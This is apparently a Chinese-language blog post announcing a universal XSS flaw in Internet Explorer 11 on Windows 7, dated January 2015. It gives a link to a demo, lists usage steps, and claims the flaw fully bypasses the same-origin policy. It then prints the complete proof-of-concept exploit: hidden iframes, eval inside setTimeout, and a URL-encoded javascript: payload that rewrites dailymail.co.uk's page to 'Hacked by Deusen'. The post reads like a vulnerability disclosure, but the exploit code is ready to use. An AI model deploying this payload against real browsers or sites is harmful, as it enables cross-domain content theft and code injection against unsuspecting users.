IE又爆出UXSS漏洞了,按照微软的步伐,这漏洞又要不知何时才能修复了。
光说不练假把式,看了这个漏洞演示地址,你啥都懂了:
http://www.deusen.co.uk/items/insider3show.3362009741042107/
此IE漏洞使通过第三域名修改dailymail.co.uk的内容称为可能。 使用方式: 1. 确认弹窗弹出后,等待3秒后关闭。 2. 点击“Go”。 3. 7秒后,dailymail.co.uk的内容将被修改为“Hacked by Deusen”
漏洞类型:UXSS
影响:完全绕过SOP
攻击效果:攻击者可以窃取任意域名的内容、将恶意代码注入任意域名
测试环境:IE11 Win7 2015年1月29日
<iframe style="display:none;" width=300 height=300 id=i name=i src="1.php"></iframe><br> <iframe width=300 height=100 frameBorder=0 src="http://www.dailymail.co.uk/robots.txt"></iframe><br> <script> function go() { w=window.frames[0]; w.setTimeout("alert(eval('x=top.frames[1];r=confirm(\\'Close this window after 3 seconds...\\');x.location=\\'javascript:%22%3Cscript%3Efunction%20a()%7Bw.document.body.innerHTML%3D%27%3Ca%20style%3Dfont-size%3A50px%3EHacked%20by%20Deusen%3C%2Fa%3E%27%3B%7D%20function%20o()%7Bw%3Dwindow.open(%27http%3A%2F%2Fwww.dailymail.co.uk%27%2C%27_blank%27%2C%27top%3D0%2C%20left%3D0%2C%20width%3D800%2C%20height%3D600%2C%20location%3Dyes%2C%20scrollbars%3Dyes%27)%3BsetTimeout(%27a()%27%2C7000)%3B%7D%3C%2Fscript%3E%3Ca%20href%3D%27javascript%3Ao()%3Bvoid(0)%3B%27%3EGo%3C%2Fa%3E%22\\';'))",1); } setTimeout("go()",1000); </script>